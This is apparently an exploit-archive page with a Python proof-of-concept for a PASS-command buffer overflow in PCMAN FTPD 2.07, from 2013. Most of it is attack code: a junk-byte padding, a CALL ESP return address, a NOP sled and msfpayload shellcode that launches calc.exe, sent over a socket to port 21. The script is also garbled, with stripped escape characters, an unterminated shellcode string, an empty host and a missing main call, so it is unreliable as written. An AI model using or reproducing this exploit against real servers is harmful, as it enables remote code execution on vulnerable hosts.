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# Title : PCMAN FTP 2.07 PASS Command - Buffer Overflow
# Published : 2013-08-02
# Author :
# Previous Title : HP Data Protector CMD Install Service Vulnerability (msf)
# Next Title : 返回列表

# -*- coding: utf-8 -*-

PCMAN FTPD 2.07 PASS Command Buffer Overflow
Author: Ottomatik
Date: 2013-07-31
Software : PCMAN FTPD
Version : 2.07
Tested On: Windows 7 SP1 - French;
    * The PASS Command is vulnerable to a buffer overflow;
    * Other commads may be vulnerable;

# Modules import;

import socket

def main() :
    Main function;
    buf = "PASS "
    buf += "A" * 6102 # JUNK
    # 0x75670253
    buf += "x53x02x67x75" # @ CALL ESP Kernel32.dll
    buf += "x90" * 40 # NOPs
    # ShellCode : msfpayload windows_exec calc.exe, bad chars = 00,0A,0C,0D

    buf +=("xddxc5xd9x74x24xf4x5ax31xc9xb8xd1x96xc1xcbxb1"
    buf += "rn"
    clt_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    clt_socket.connect(("", 21))
    print clt_socket.recv(2048)
    clt_socket.send("USER anonymousrn")
    print clt_socket.recv(2048)
    print clt_socket.recv(2048)

if __name__ == "__main__" :